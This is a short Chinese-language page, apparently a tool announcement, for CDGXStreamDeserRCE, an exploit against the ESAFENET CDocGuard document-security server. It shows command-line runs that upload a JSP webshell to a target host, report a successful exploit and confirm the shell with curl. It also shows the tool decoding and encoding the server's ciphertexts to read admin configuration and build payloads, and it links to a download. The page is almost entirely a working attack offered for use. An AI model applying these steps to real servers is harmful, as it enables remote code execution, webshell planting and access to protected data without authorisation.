0x01 工具介绍
0x02 安装与使用
$ cat test1.jsp
<%
out.println("e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43");
%>
$ java -jar CDGXStreamDeserRCE.jar -p http://127.0.0.1:8080 -uf test1.jsp -t https://192.168.31.190:8443
[ ] Exploit Successed
[//192.168.31.190:8443/CDGServer3/test1.jsp ] WebShell: https:
$ curl -k https://192.168.31.190:8443/CDGServer3/test1.jsp
e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43
二、密文解码,读取文件内容进行解码或直接对字符串进行解码。
$ java -jar CDGXStreamDeserRCE.jar -d e.txt
<CDGAuthoriseTemplet>
<authoriseTempletList>
<AuthoriseTemplet>
<name>SystemAdmin</name>
<description>3FF8A0978
....
$ java -jar CDGXStreamDeserRCE.jar -d FEPCCCLCENHIPOAFPAPDDFCGEAPNMDBMOJPMJAKKNPHOKIKIDCBPHEGKLDGNHCBDEIMODEKMKPFBAIMMNLOJJKMIICLAPJAAFGNGAKFBMPKPJMOIKODEJJMHJCCHKBMFMMFDLOMDPABOJCEAPOFDCPMKGDHFNBBIMCIPAMMIIANFPAJHFAABLLLANNIDAGNKOHONJGFGBKHFDMCLJIMICBHBJEIAAIMACN
<SystemReturn>
<returnMessage>Error1200</returnMessage>
</SystemReturn>
三、明文编码,读取文件内容进行编码或直接对字符串进行编码。
java -jar CDGXStreamDeserRCE.jar -e payload.xml
"C:Program Files (x86)ESAFENETCDocGuard Servertomcat64webappsCDGServer3" java -jar CDGXStreamDeserRCE.jar -e
BCBILAKIDOOOCGKJDBBFOCGJFGFJPNJALCHEBLGLBFAMKDDLPBCFFJCJHOPGLEACMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGALLCGLOJNJBHCLMNNGHHJJNAAKPMEDFJDGCEMDADGDCEFFCGEGNFLGHCH
0x03 下载链接
https://github.com/0xf4n9x/CDGXStreamDeserRCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论